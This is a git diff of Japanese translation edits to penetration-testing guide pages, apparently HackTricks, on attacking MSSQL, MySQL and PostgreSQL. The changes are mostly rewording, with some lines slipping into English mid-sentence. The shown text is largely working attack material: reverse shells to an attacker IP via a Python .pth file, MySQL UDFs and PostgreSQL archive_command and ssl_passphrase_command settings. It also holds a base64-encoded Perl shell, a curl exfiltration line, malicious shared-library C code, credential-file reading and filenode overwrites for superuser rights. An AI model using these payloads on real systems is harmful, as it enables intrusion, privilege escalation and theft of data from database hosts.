+> [!TIP]
 > ユーザーを偽装できる場合、たとえそのユーザーがsysadminでなくても、**そのユーザーが他の** **データベース** **やリンクサーバーにアクセスできるかどうかを確認するべきです。**
-
-sysadminになると、他のユーザーを偽装できることに注意してください:
+> 
+> sysadminになると、他のユーザーを偽装できることに注意してください:
 ```sql
 -- Impersonate RegUser
 EXECUTE AS LOGIN = 'RegUser'
@@ -544,19 +545,19 @@ Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuse
 権限を確認した後、次の3つのことを設定する必要があります。
 
 1. SQL ServerインスタンスでTCP/IPを有効にする。
-2. スタートアップパラメータを追加する。この場合、トレースフラグ-T7806が追加されます。
+2. スタートアップパラメータを追加する。この場合、トレースフラグが追加されます。-T7806です。
 3. リモート管理接続を有効にする。
 
 これらの設定を自動化するために、[このリポジトリ](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/)には必要なスクリプトがあります。設定の各ステップのためのPowerShellスクリプトがあるだけでなく、設定スクリプトとパスワードの抽出および復号化を組み合わせた完全なスクリプトも含まれています。
 
-この攻撃に関するさらなる情報は、次のリンクを参照してください:[MSSQLデータベースリンクサーバーパスワードの復号化](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/)
+この攻撃に関するさらなる情報については、次のリンクを参照してください:[MSSQLデータベースリンクサーバーパスワードの復号化](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/)
 
 [SQL Server専用管理者接続のトラブルシューティング](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/)
 
 ## ローカル特権昇格
 
 MSSQLサーバーを実行しているユーザーは、特権トークン**SeImpersonatePrivilege**を有効にしています。\
-おそらく、次の2つのページのいずれかに従って**管理者に昇格**できるでしょう:
+おそらく、次の2つのページのいずれかに従って**管理者に昇格する**ことができるでしょう:
 
 {{#ref}}
 ../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
diff --git a/src/network-services-pentesting/pentesting-mysql.md b/src/network-services-pentesting/pentesting-mysql.md
index 3f1c0bb85..82a96b5ad 100644
--- a/src/network-services-pentesting/pentesting-mysql.md
+++ b/src/network-services-pentesting/pentesting-mysql.md
@@ -101,23 +101,24 @@ SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCT
 #@ Functions not from sys. db
 SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
 ```
-あなたはドキュメントで各特権の意味を見ることができます: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_execute)
+You can see in the docs the meaning of each privilege: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_execute)
+
+### MySQL File RCE
 
-### MySQLファイルRCE
 
 {{#ref}}
 ../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
 {{#endref}}
 
-#### INTO OUTFILE → Python `.pth` RCE(サイト固有の設定フック)
+#### INTO OUTFILE → Python `.pth` RCE (サイト固有の設定フック)
 
 古典的な `INTO OUTFILE` プリミティブを悪用することで、後に **Python** スクリプトを実行するターゲットで *任意のコード実行* を取得することが可能です。
 
-1. `INTO OUTFILE` を使用して、`site.py` に自動的に読み込まれる任意のディレクトリ内にカスタム **`.pth`** ファイルをドロップします(例: `.../lib/python3.10/site-packages/`)。
-2. `.pth` ファイルには、`import ` で始まる *1行* の任意のPythonコードが含まれており、インタープリタが起動するたびに実行されます。
-3. インタープリタがCGIスクリプトによって暗黙的に実行されるとき(例えば、`/cgi-bin/ml-draw.py` でシェバン `#!/bin/python` を使用) payloadはウェブサーバープロセスと同じ特権で実行されます(FortiWebはそれを **root** として実行しました → 完全な事前認証RCE)。
+1. `INTO OUTFILE` を使用して、`site.py` によって自動的に読み込まれる任意のディレクトリ内にカスタム **`.pth`** ファイルをドロップします(例: `.../lib/python3.10/site-packages/`)。
+2. `.pth` ファイルには、`import ` で始まる *1行* の任意の Python コードが含まれており、インタープリタが起動するたびに実行されます。
+3. インタープリタがCGIスクリプトによって暗黙的に実行されるとき(例えば、`/cgi-bin/ml-draw.py` でシェバン `#!/bin/python` を使用) payload はウェブサーバープロセスと同じ権限で実行されます(FortiWeb はそれを **root** として実行しました → 完全な認証前 RCE)。
 
-例 `.pth` ペイロード(単一行、最終SQLペイロードにスペースを含めることはできないため、hex/`UNHEX()` または文字列連結が必要になる場合があります):
+例 `.pth` ペイロード(1行、最終的なSQLペイロードにスペースを含めることはできないため、hex/`UNHEX()` または文字列連結が必要になる場合があります):
 ```python
 import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)
 ```
@@ -128,11 +129,11 @@ import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10
 重要な制限事項とバイパス:
 
 * `INTO OUTFILE` **は既存のファイルを上書きできません**; 新しいファイル名を選択してください。
-* ファイルパスは **MySQLのCWDに対して相対的に解決される**ため、`../../`をプレフィックスとして使用することでパスを短縮し、絶対パスの制限をバイパスできます。
-* 攻撃者の入力が`%128s`(または類似のもの)で抽出されると、任意のスペースがペイロードを切り詰めます; スペースを置き換えるためにMySQLコメントシーケンス`/**/`または`/*!*/`を使用してください。
-* クエリを実行するMySQLユーザーは`FILE`権限が必要ですが、多くのアプライアンス(例: FortiWeb)ではサービスが **root** として実行され、ほぼどこでも書き込みアクセスが与えられます。
+* ファイルパスは **MySQLのCWDに対して相対的に解決される**ため、`../../`でプレフィックスを付けることでパスを短縮し、絶対パスの制限をバイパスできます。
+* 攻撃者の入力が `%128s`(または類似のもの)で抽出されると、任意のスペースがペイロードを切り詰めます; スペースを置き換えるためにMySQLコメントシーケンス `/**/` または `/*!*/` を使用してください。
+* クエリを実行するMySQLユーザーは `FILE` 権限が必要ですが、多くのアプライアンス(例: FortiWeb)ではサービスが **root** として実行され、ほぼどこでも書き込みアクセスが与えられます。
 
-`.pth`を削除した後、単にpythonインタープリタによって処理される任意のCGIをリクエストしてコード実行を取得します:
+`.pth` を削除した後、単にpythonインタープリタによって処理される任意のCGIをリクエストしてコード実行を得ます:
 ```
 GET /cgi-bin/ml-draw.py HTTP/1.1
 Host: 
@@ -148,8 +149,8 @@ uid=0(root) gid=0(root) groups=0(root)
 
 ## MySQL クライアントによる任意のファイルの読み取り
 
-実際、**テーブルにローカルデータをロードする**際に、MySQL または MariaDB サーバーは **クライアントにファイルを読み取って** その内容を送信するように要求します。**したがって、mysql クライアントを改ざんして自分の MySQL サーバーに接続できれば、任意のファイルを読み取ることができます。**\
-この動作は次のように注意してください:
+実際に、**テーブルにローカルデータをロードする**際に、MySQL または MariaDB サーバーは **クライアントにファイルを読み取って** その内容を送信するように要求します。**したがって、mysql クライアントを改ざんして自分の MySQL サーバーに接続できれば、任意のファイルを読み取ることができます。**\
+この動作は次のように行われます:
 ```bash
 load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
 ```
@@ -206,7 +207,7 @@ grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mys
 # Get a shell (with your permissions, usefull for sudo/suid privesc)
 \! sh
 ```
-### 特権昇格 via ライブラリ
+### ライブラリを介した特権昇格
 
 もし**mysqlサーバーがroot**(または他の特権のあるユーザー)として実行されている場合、コマンドを実行させることができます。そのためには、**ユーザー定義関数**を使用する必要があります。そして、ユーザー定義を作成するには、mysqlが実行されているOS用の**ライブラリ**が必要です。
 
@@ -239,7 +240,7 @@ create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
 select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
 select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
 ```
-#### ウィンドウズ
+#### Windows
 ```sql
 # CHech the linux comments for more indications
 USE mysql;
@@ -253,21 +254,21 @@ SELECT sys_exec("net localgroup Administrators npn /add");
 ```
 ### MySQLの資格情報をファイルから抽出する
 
-_/etc/mysql/debian.cnf_ 内には、ユーザー **debian-sys-maint** の **平文パスワード** が含まれています。
+_/etc/mysql/debian.cnf_ の中に、ユーザー **debian-sys-maint** の **平文パスワード** を見つけることができます。
 ```bash
 cat /etc/mysql/debian.cnf
 ```
-これらの資格情報を使用してMySQLデータベースにログインできます。
+これらの資格情報を使用して**MySQLデータベースにログインできます**。
 
-ファイル _/var/lib/mysql/mysql/user.MYD_ の中には、**MySQLユーザーのすべてのハッシュ**(データベース内のmysql.userから抽出できるもの)が見つかります。
+ファイル _/var/lib/mysql/mysql/user.MYD_ の中には、**MySQLユーザーのすべてのハッシュ**(データベース内のmysql.userから抽出できるもの)が見つかります_。
 
-次のようにしてそれらを抽出できます:
+これらを抽出するには、次のようにします:
 ```bash
 grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
 ```
 ### ロギングの有効化
 
-mysqlクエリのロギングを`/etc/mysql/my.cnf`内で有効にするには、以下の行のコメントを外します。
+mysqlクエリのロギングを`/etc/mysql/my.cnf`で有効にするには、以下の行のコメントを外します。
 
 ![](<../images/image (899).png>)
 
@@ -649,11 +650,11 @@ Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS
 ## 2023-2025 ハイライト (新)
 
 ### JDBC `propertiesTransform` デシリアライズ (CVE-2023-21971)
-Connector/J <= 8.0.32 から、**JDBC URL** に影響を与えることができる攻撃者(例えば、接続文字列を要求するサードパーティ製ソフトウェア内で)は、`propertiesTransform` パラメータを介して *クライアント* 側に任意のクラスをロードするよう要求できます。クラスパス上に存在するガジェットがロード可能であれば、これは **JDBC クライアントのコンテキストでのリモートコード実行** を引き起こします(有効な認証情報は必要ないため、事前認証です)。最小限の PoC は次のようになります:
+Connector/J <= 8.0.32 から、**JDBC URL** に影響を与えることができる攻撃者(例えば、接続文字列を要求するサードパーティ製ソフトウェア内で)は、`propertiesTransform` パラメータを介して *クライアント* 側に任意のクラスをロードするよう要求できます。クラスパス上に存在するガジェットがロード可能であれば、これは **JDBC クライアントのコンテキストでのリモートコード実行** を引き起こします(有効な資格情報は必要ないため、事前認証です)。最小限の PoC は次のようになります:
 ```java
 jdbc:mysql://:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil
 ```
-`Evil.class`を実行するのは、脆弱なアプリケーションのクラスパスに配置するか、悪意のあるMySQLサーバーが悪意のあるシリアライズされたオブジェクトを送信することで簡単に行えます。この問題はConnector/J 8.0.33で修正されました - ドライバーをアップグレードするか、`propertiesTransform`をホワイトリストに明示的に設定してください。
+`Evil.class`を実行するのは、脆弱なアプリケーションのクラスパスに配置するか、悪意のあるMySQLサーバーに悪意のあるシリアライズされたオブジェクトを送信させることで簡単に行えます。この問題はConnector/J 8.0.33で修正されました - ドライバーをアップグレードするか、`propertiesTransform`を明示的にホワイトリストに設定してください。
 (詳細についてはSnykのレポートを参照)
 
 ### JDBCクライアントに対するロゲ/フェイクMySQLサーバー攻撃
diff --git a/src/network-services-pentesting/pentesting-postgresql.md b/src/network-services-pentesting/pentesting-postgresql.md
index de7fa8419..5717d9e2b 100644
--- a/src/network-services-pentesting/pentesting-postgresql.md
+++ b/src/network-services-pentesting/pentesting-postgresql.md
@@ -4,7 +4,7 @@
 
 ## **基本情報**
 
-**PostgreSQL** は **オブジェクトリレーショナルデータベースシステム** として説明されており、**オープンソース** です。このシステムは SQL 言語を利用するだけでなく、追加機能で強化しています。その機能により、幅広いデータ型と操作を処理できるため、開発者や組織にとって多用途な選択肢となっています。
+**PostgreSQL** は **オブジェクトリレーショナルデータベースシステム** として説明されており、**オープンソース** です。このシステムは SQL 言語を利用するだけでなく、追加機能で強化しています。その機能により、幅広いデータ型と操作を扱うことができ、開発者や組織にとって多用途な選択肢となっています。
 
 **デフォルトポート:** 5432、もしこのポートがすでに使用されている場合、postgresql は使用されていない次のポート(おそらく 5433)を使用するようです。
 ```
@@ -56,6 +56,7 @@ SELECT * FROM pg_extension;
 
 **PostgreSQLデータベースを悪用する方法**についての詳細は、以下を確認してください:
 
+
 {{#ref}}
 ../pentesting-web/sql-injection/postgresql-injection/
 {{#endref}}
@@ -80,7 +81,7 @@ connect_timeout=10');
 ```
 - ホストがダウンしています
 
-`DETAIL: サーバーに接続できませんでした: ホストへのルートがありません "1.2.3.4" でサーバーは稼働しており、ポート 5678 で TCP/IP 接続を受け入れていますか?`
+`DETAIL: サーバーに接続できませんでした: ホストへのルートがありません "1.2.3.4" でサーバーが実行中で、ポート 5678 で TCP/IP 接続を受け入れていますか?`
 
 - ポートが閉じています
 ```
@@ -92,7 +93,7 @@ running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
 DETAIL:  server closed the connection unexpectedly This  probably  means
 the server terminated abnormally before or while processing the request
 ```
-または
+or
 ```
 DETAIL:  FATAL:  password authentication failed for user "name"
 ```
@@ -101,7 +102,7 @@ DETAIL:  FATAL:  password authentication failed for user "name"
 DETAIL:  could not connect to server: Connection timed out Is the server
 running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
 ```
-PL/pgSQL関数では、現在例外の詳細を取得することはできません。ただし、PostgreSQLサーバーに直接アクセスできる場合は、必要な情報を取得できます。システムテーブルからユーザー名やパスワードを抽出することが不可能な場合は、前のセクションで説明したワードリスト攻撃手法を利用することを検討してください。これは、ポジティブな結果をもたらす可能性があります。
+In PL/pgSQL関数では、現在例外の詳細を取得することはできません。ただし、PostgreSQLサーバーに直接アクセスできる場合は、必要な情報を取得できます。システムテーブルからユーザー名とパスワードを抽出することが不可能な場合は、前のセクションで説明したワードリスト攻撃手法を利用することを検討してください。これは、ポジティブな結果をもたらす可能性があります。
 
 ## 権限の列挙
 
@@ -111,7 +112,7 @@ PL/pgSQL関数では、現在例外の詳細を取得することはできませ
 | -------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------- |
 | rolsuper       | ロールはスーパーユーザー権限を持っています                                                                                                            |
 | rolinherit     | ロールは自動的にそのメンバーであるロールの権限を継承します                                                                                            |
-| rolcreaterole  | ロールは新しいロールを作成できます                                                                                                                 |
+| rolcreaterole  | ロールは他のロールを作成できます                                                                                                                     |
 | rolcreatedb    | ロールはデータベースを作成できます                                                                                                                  |
 | rolcanlogin    | ロールはログインできます。つまり、このロールは初期セッションの認証識別子として指定できます                                                       |
 | rolreplication | ロールはレプリケーションロールです。レプリケーションロールはレプリケーション接続を開始し、レプリケーションスロットを作成および削除できます。       |
@@ -129,7 +130,7 @@ PL/pgSQL関数では、現在例外の詳細を取得することはできませ
 - **`pg_write_server_files`**のメンバーであれば、ファイルを**書き込む**ことができます
 
 > [!TIP]
-> Postgresでは、**ユーザー**、**グループ**、および**ロール**は**同じ**であることに注意してください。これは**どのように使用するか**と**ログインを許可するか**に依存します。
+> Postgresでは、**ユーザー**、**グループ**、および**ロール**は**同じ**であることに注意してください。これは**どのように使用するか**と、**ログインを許可するか**に依存します。
 ```sql
 # Get users roles
 \du
@@ -260,7 +261,7 @@ GRANT pg_read_server_files TO username;
 copy (select convert_from(decode('','base64'),'utf-8')) to '/just/a/path.exec';
 ```
 > [!WARNING]
-> あなたがスーパーユーザーでない場合でも、**`CREATEROLE`** 権限を持っていれば、**そのグループのメンバーになることができます:**
+> **`CREATEROLE`** 権限を持っているがスーパーユーザーでない場合、**そのグループのメンバーになることができます:**
 >
 > ```sql
 > GRANT pg_write_server_files TO username;
@@ -268,32 +269,33 @@ copy (select convert_from(decode('','base64'),'utf-8')) to '/ju
 >
 > [**詳細情報。**](pentesting-postgresql.md#privilege-escalation-with-createrole)
 
-COPYは改行文字を処理できないため、base64ペイロードを使用している場合でも、**1行で送信する必要があります**。\
-この技術の非常に重要な制限は、**`copy`がバイナリファイルを書き込むために使用できないことです。なぜなら、いくつかのバイナリ値を変更するからです。**
+COPY は改行文字を処理できないため、base64 ペイロードを使用している場合でも、**1 行で送信する必要があります**。\
+この技術の非常に重要な制限は、**`copy` はバイナリファイルを書き込むために使用できないことです。バイナリ値の一部を変更するためです。**
 
 ### **バイナリファイルのアップロード**
 
 ただし、**大きなバイナリファイルをアップロードするための他の技術があります:**
 
+
 {{#ref}}
 ../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
 {{#endref}}
 
 
 
-### ローカルファイル書き込みを介したPostgreSQLテーブルデータの更新
+### ローカルファイル書き込みを介した PostgreSQL テーブルデータの更新
 
-PostgreSQLサーバーファイルを読み書きするための必要な権限がある場合、**関連するファイルノードを上書きすることによって、サーバー上の任意のテーブルを更新できます** [PostgreSQLデータディレクトリ](https://www.postgresql.org/docs/8.1/storage.html)で。**この技術の詳細は** [**こちら**](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users)で。
+PostgreSQL サーバーファイルを読み書きするための必要な権限がある場合、[PostgreSQL データディレクトリ](https://www.postgresql.org/docs/8.1/storage.html)内の関連ファイルノードを**上書きすることによって、サーバー上の任意のテーブルを更新できます。** **この技術の詳細** [**こちら**](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users)。
 
 必要な手順:
 
-1.  PostgreSQLデータディレクトリを取得する
+1.  PostgreSQL データディレクトリを取得する
 
 ```sql
 SELECT setting FROM pg_settings WHERE name = 'data_directory';
 ```
 
-**注意:** 設定から現在のデータディレクトリパスを取得できない場合は、`SELECT version()`クエリを通じて主要なPostgreSQLバージョンを照会し、パスをブルートフォースすることを試みることができます。UnixインストールのPostgreSQLの一般的なデータディレクトリパスは`/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/`です。一般的なクラスター名は`main`です。
+**注意:** 設定から現在のデータディレクトリパスを取得できない場合、`SELECT version()` クエリを通じて主要な PostgreSQL バージョンを照会し、パスをブルートフォースすることを試みることができます。Unix インストールの PostgreSQL の一般的なデータディレクトリパスは `/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/` です。一般的なクラスター名は `main` です。
 
 2.  対象テーブルに関連付けられたファイルノードへの相対パスを取得する
 
@@ -301,9 +303,9 @@ SELECT setting FROM pg_settings WHERE name = 'data_directory';
 SELECT pg_relation_filepath('{TABLE_NAME}')
 ```
 
-このクエリは`base/3/1337`のようなものを返すべきです。ディスク上のフルパスは`$DATA_DIRECTORY/base/3/1337`、すなわち`/var/lib/postgresql/13/main/base/3/1337`です。
+このクエリは `base/3/1337` のようなものを返すべきです。ディスク上のフルパスは `$DATA_DIRECTORY/base/3/1337` すなわち `/var/lib/postgresql/13/main/base/3/1337` です。
 
-3.  `lo_*`関数を通じてファイルノードをダウンロードする
+3.  `lo_*` 関数を通じてファイルノードをダウンロードする
 
 ```sql
 SELECT lo_import('{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}',13337)
@@ -331,7 +333,7 @@ ON pg_attribute.attrelid = pg_class.oid
 WHERE pg_class.relname = '{TABLE_NAME}';
 ```
 
-5.  [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor)を使用して[ファイルノードを編集](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users)し、すべての`rol*`ブールフラグを1に設定してフル権限を付与します。
+5.  [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor)を使用して[ファイルノードを編集](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users); すべての `rol*` ブールフラグを 1 に設定してフル権限を付与します。
 
 ```bash
 python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV_FROM_STEP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA}
@@ -339,28 +341,28 @@ python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV
 
 ![PostgreSQL Filenode Editor Demo](https://raw.githubusercontent.com/adeadfed/postgresql-filenode-editor/main/demo/demo_datatype.gif)
 
-6.  編集したファイルノードを`lo_*`関数を介して再アップロードし、ディスク上の元のファイルを上書きします
+6.  編集したファイルノードを `lo_*` 関数を介して再アップロードし、ディスク上の元のファイルを上書きします。
 
 ```sql
 SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64'))
 SELECT lo_export(13338,'{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}')
 ```
 
-7.  _(オプション)_ 高コストのSQLクエリを実行してメモリ内のテーブルキャッシュをクリアします
+7.  _(オプション)_ 高コストの SQL クエリを実行してメモリ内のテーブルキャッシュをクリアします。
 
 ```sql
 SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea)
 ```
 
-8.  これで、PostgreSQLで更新されたテーブル値が表示されるはずです。
+8.  これで PostgreSQL に更新されたテーブル値が表示されるはずです。
 
-`pg_authid`テーブルを編集することでスーパーユーザーになることもできます。**次のセクションを参照してください** [**以下のセクション**](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables)。
+`pg_authid` テーブルを編集することでスーパーユーザーになることもできます。**次のセクションを参照してください** [**以下のセクション**](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables)。
 
 ## RCE
 
-### **プログラムへのRCE**
+### **プログラムへの RCE**
 
-[バージョン9.3以降](https://www.postgresql.org/docs/9.3/release-9-3.html)、**スーパーユーザー**および**`pg_execute_server_program`**グループのメンバーのみがRCEのためにcopyを使用できます(例:情報漏洩のための)。
+[バージョン 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html)以降、**スーパーユーザー**およびグループ **`pg_execute_server_program`** のメンバーのみが RCE のために copy を使用できます (例: 外部流出):
 ```sql
 '; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -
 ```
@@ -391,13 +393,15 @@ COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::I
 
 ### PostgreSQL言語によるRCE
 
+
 {{#ref}}
 ../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
 {{#endref}}
 
-### PostgreSQL拡張機能によるRCE
+### PostgreSQL拡張によるRCE
+
+前の投稿から**バイナリファイルをアップロードする方法**を**学んだ**後、**PostgreSQL拡張をアップロードして読み込むことでRCEを取得する**ことを試みることができます。
 
-前の投稿から**バイナリファイルをアップロードする方法**を**学んだ**後、**PostgreSQL拡張機能をアップロードして読み込むことでRCEを取得する**ことを試みることができます。
 
 {{#ref}}
 ../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
@@ -420,36 +424,36 @@ PostgreSQLの**設定ファイル**は、データベースを実行している
 
 - `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` データベースのプライベートキーへのパス
 - `ssl_passphrase_command = ''` プライベートファイルがパスワードで保護されている場合(暗号化されている)、PostgreSQLはこの属性に指定された**コマンドを実行します**。
-- `ssl_passphrase_command_supports_reload = off` この属性が**オン**の場合、パスワードで保護されたキーが**実行されるときに**実行される**コマンド**が`pg_reload_conf()`が**実行されるときに**実行されます。
+- `ssl_passphrase_command_supports_reload = off` この属性が**オン**の場合、パスワードで保護されたキーがあるときに実行される**コマンド**は、`pg_reload_conf()`が**実行されるときに実行されます**。
 
 そのため、攻撃者は次のことを行う必要があります:
 
-1. サーバーから**プライベートキーをダンプ**
-2. ダウンロードしたプライベートキーを**暗号化**:
+1. サーバーから**プライベートキーをダンプ**する
+2. ダウンロードしたプライベートキーを**暗号化**する:
 1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key`
 3. **上書き**
-4. 現在のPostgreSQLの**設定をダンプ**
-5. 言及された属性設定で**設定を上書き**:
+4. 現在のPostgreSQLの**設定をダンプ**する
+5. 言及された属性設定で**設定を上書き**する:
 1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'`
 2. `ssl_passphrase_command_supports_reload = on`
-6. `pg_reload_conf()`を実行
+6. `pg_reload_conf()`を実行する
 
-これをテストしていると、**プライベートキーファイルの権限が640である場合**にのみ機能することに気付きました。これは**rootによって所有され**、**ssl-certまたはpostgresグループによって所有されている**(したがって、postgresユーザーが読み取れる)必要があります。また、_ /var/lib/postgresql/12/main_ に配置されている必要があります。
+これをテストしていると、**プライベートキーファイルの権限が640である場合**にのみ機能することに気付きました。これは**rootによって所有され**、**ssl-certまたはpostgresグループによって所有されている**(したがって、postgresユーザーが読み取れる)必要があり、_ /var/lib/postgresql/12/main_ に配置されている必要があります。
 
 #### **archive_commandによるRCE**
 
-**この設定とWALに関する** [**詳細情報はこちら**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**。**
+**この設定とWALに関する** [**詳細情報**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**。**
 
-設定ファイルの別の悪用可能な属性は`archive_command`です。
+設定ファイルの中で、悪用可能な別の属性は`archive_command`です。
 
 これが機能するためには、`archive_mode`設定が`'on'`または`'always'`である必要があります。それが真であれば、`archive_command`のコマンドを上書きし、WAL(書き込み先行ログ)操作を介して実行させることができます。
 
 一般的な手順は次のとおりです:
 
-1. アーカイブモードが有効かどうかを確認: `SELECT current_setting('archive_mode')`
-2. ペイロードで`archive_command`を上書きします。例えば、リバースシェル: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
-3. 設定をリロード: `SELECT pg_reload_conf()`
-4. WAL操作を強制的に実行し、アーカイブコマンドを呼び出します: `SELECT pg_switch_wal()` または一部のPostgresバージョンでは `SELECT pg_switch_xlog()`
+1. アーカイブモードが有効かどうかを確認する: `SELECT current_setting('archive_mode')`
+2. ペイロードで`archive_command`を上書きする。例えば、リバースシェル: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
+3. 設定をリロードする: `SELECT pg_reload_conf()`
+4. WAL操作を強制的に実行し、アーカイブコマンドを呼び出す: `SELECT pg_switch_wal()` または一部のPostgresバージョンでは `SELECT pg_switch_xlog()`
 
 #### **プリロードライブラリによるRCE**
 
@@ -457,18 +461,18 @@ PostgreSQLの**設定ファイル**は、データベースを実行している
 
 この攻撃ベクターは、次の設定変数を利用します:
 
-- `session_preload_libraries` -- クライアント接続時にPostgreSQLサーバーによって読み込まれるライブラリ。
+- `session_preload_libraries` -- クライアント接続時にPostgreSQLサーバーによってロードされるライブラリ。
 - `dynamic_library_path` -- PostgreSQLサーバーがライブラリを検索するディレクトリのリスト。
 
-`dynamic_library_path`の値を、データベースを実行している`postgres`ユーザーによって書き込み可能なディレクトリ(例: `/tmp/`ディレクトリ)に設定し、そこに悪意のある`.so`オブジェクトをアップロードします。次に、`session_preload_libraries`変数に新しくアップロードしたライブラリを含めることで、PostgreSQLサーバーにそれを読み込ませます。
+`dynamic_library_path`の値を、データベースを実行している`postgres`ユーザーによって書き込み可能なディレクトリ、例えば`/tmp/`ディレクトリに設定し、そこに悪意のある`.so`オブジェクトをアップロードします。次に、`session_preload_libraries`変数に新しくアップロードしたライブラリを含めることで、PostgreSQLサーバーにそれをロードさせます。
 
 攻撃手順は次のとおりです:
 
-1. 元の`postgresql.conf`をダウンロード
-2. `dynamic_library_path`の値に`/tmp/`ディレクトリを含める、例: `dynamic_library_path = '/tmp:$libdir'`
-3. `session_preload_libraries`の値に悪意のあるライブラリ名を含める、例: `session_preload_libraries = 'payload.so'`
-4. `SELECT version()`クエリを介して主要なPostgreSQLバージョンを確認
-5. 正しいPostgreSQL開発パッケージで悪意のあるライブラリコードをコンパイル サンプルコード:
+1. 元の`postgresql.conf`をダウンロードする
+2. `/tmp/`ディレクトリを`dynamic_library_path`の値に含める。例えば、`dynamic_library_path = '/tmp:$libdir'`
+3. 悪意のあるライブラリ名を`session_preload_libraries`の値に含める。例えば、`session_preload_libraries = 'payload.so'`
+4. `SELECT version()`クエリを介して主要なPostgreSQLバージョンを確認する
+5. 正しいPostgreSQL開発パッケージで悪意のあるライブラリコードをコンパイルする サンプルコード:
 
 ```c
 #include 
@@ -509,15 +513,15 @@ execve("/bin/bash", argv, NULL);
 }
 ```
 
-コードをコンパイル:
+コードをコンパイルする:
 
 ```bash
 gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so payload.c
 ```
 
-6. ステップ2-3で作成した悪意のある`postgresql.conf`をアップロードし、元のものを上書き
-7. ステップ5の`payload.so`を`/tmp`ディレクトリにアップロード
-8. サーバーを再起動するか、`SELECT pg_reload_conf()`クエリを呼び出してサーバー設定をリロード
+6. ステップ2-3で作成した悪意のある`postgresql.conf`をアップロードし、元のものを上書きする
